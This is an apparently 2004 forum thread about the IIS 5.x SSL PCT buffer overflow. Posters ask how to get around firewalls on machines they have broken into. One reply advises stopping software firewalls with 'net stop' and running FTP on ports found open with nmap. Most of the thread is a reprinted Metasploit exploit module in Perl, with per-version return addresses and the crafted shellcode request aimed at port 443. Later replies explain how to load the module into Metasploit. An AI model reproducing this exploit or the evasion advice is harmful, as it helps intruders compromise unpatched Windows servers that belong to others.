Iis Ssl 5.0
Started by Guest_tte_*, Apr 24 2004 01:55 PM
9 replies to this topic

#1 Guest_tte_*
Posted 24 April 2004 - 01:55 PM
goddammit.. almost every comp is firewalled and I can't install an FTP..
anyone have any ideas?!
Thanks, tte.
#2
Posted 24 April 2004 - 02:10 PM
version 0.2 of the exploit seems to be successful only on internal LANs, so you can't install an FTP there, just sniff the network to try to hack nearby machines.
#3
Posted 25 April 2004 - 05:58 AM
you shouldn't hack (crack) any computers which aren't your own....
however.... if you choose to ignore this well
firstly, you can stop any software firewalls with net stop firewallname
secondly, often a firewall for a webhost will have certain ports open.... well, find that port (a good scanner such as nmap can often detect if a port is blocked rather than just not being used) and set your ftp there
#4
Posted 25 April 2004 - 06:00 AM
try ports like 21, 22, 23, 25, 80; they might be taken but it's the best I've got to recommend
#5
Posted 25 April 2004 - 08:36 AM
i can't start a new topic, so i'm adding my question here; maybe somebody knows what language this code is.
it is posted @k-otic but i don't know what language this code is.
can anybody help me?
package Msf::Exploit::iis5x_ssl_pct;
use base "Msf::Exploit";
use strict;

my $advanced = { };

my $info =
{
    'Name'     => 'IIS 5.x SSL PCT Overflow',
    'Version'  => '$Revision: 1.22 $',
    'Authors'  => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]',
                    'Johnny Cyberpunk <jcyberpunk@thc.org> [Unknown License]' ],
    'Arch'     => [ 'x86' ],
    'OS'       => [ 'win32' ],
    'Priv'     => 1,
    'AutoOpts' => { 'EXITFUNC' => 'thread' },
    'UserOpts' => {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 443],
    },
    'Payload' => {
        'MinNops'  => 0,
        'MaxNops'  => 0,
        'Space'    => 1800,
        'BadChars' => '',
    },
    'Description' => qq{
        This module exploits a buffer overflow in the Microsoft Windows PCT
        protocol stack. This code is based on Johnny Cyberpunk's THC release
        and has been tested against Windows 2000 and Windows XP. This vulnerability
        may not affect Windows 2000 SP0 or Windows 2003.
    },
    'Refs' => [
    ],
    'Targets' => [
        #['Windows 2000 SP4/SP3', 0x6741a7c6],
        ['Windows 2000 SP4', 0x67419ce8],
        ['Windows 2000 SP3', 0x67419e1d],
        ['Windows 2000 SP2', 0x6741a426],
        ['Windows 2000 SP1', 0x6741a199],
        ['Windows XP SP0', 0x0ffb7de9],
        ['Windows XP SP1', 0x0ffb832f],
    ],
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];

    $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

    # return address is [esp+0x6c] (dssenh.dll)
    # this is a heap ptr to the ssl request
    # ... and just happens to not die
    # thanks to CORE, Halvar, JohnnyC
    #
    # 80620101     => and byte ptr [esi+1], 0x2
    # bd00010001   => mov ebp, 0x1000100
    # 0016         => add [esi], dl
    # 8f8201000000 => pop [esi+1]
    # eb0f         => jmp short 11 to shellcode

    my $request =
        "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00".
        "\xeb\x0f".'XXXXXXXXXXX'.pack('V', ($target->[1] ^ 0xffffffff)).
        $shellcode;

    my $s = Msf::Socket->new({'SSL' => 0});
    if (! $s->Tcp($target_host, $target_port))
    {
        $self->PrintLine("[*] Error: could not connect: " . $s->GetError());
        return;
    }

    $self->PrintLine("[*] Sending " . length($request) . " bytes to remote host.");
    $s->Send($request);

    $self->PrintLine("[*] Waiting for a response...");
    my $r = $s->Recv(-1, 5);

    return;
}
#7
Posted 25 April 2004 - 09:12 AM
that's PERL, just put the code in a .pl file and run the script under an environment with perl installed.
#8 Guest_Qlimax_*
Posted 25 April 2004 - 09:54 AM
what does that perl need to do?
> that's PERL, just put the code in a .pl file and run the script under an environment with perl installed.
#9
Posted 26 April 2004 - 06:11 AM
i also thought yesterday that it has to be perl, but i tested it and it doesn't work in a .pl file. the ending at k-otic was .pm, but it doesn't work with perl, or i am using it wrong.
i tested it as test.pl but nothing appeared
han
#10
Posted 26 April 2004 - 06:25 AM
You guys are funny, the perl code above is an exploit module for the metasploit program. You just can't run it like that, you need to save it to the exploit directory in metasploit and it should detect the newly added exploit.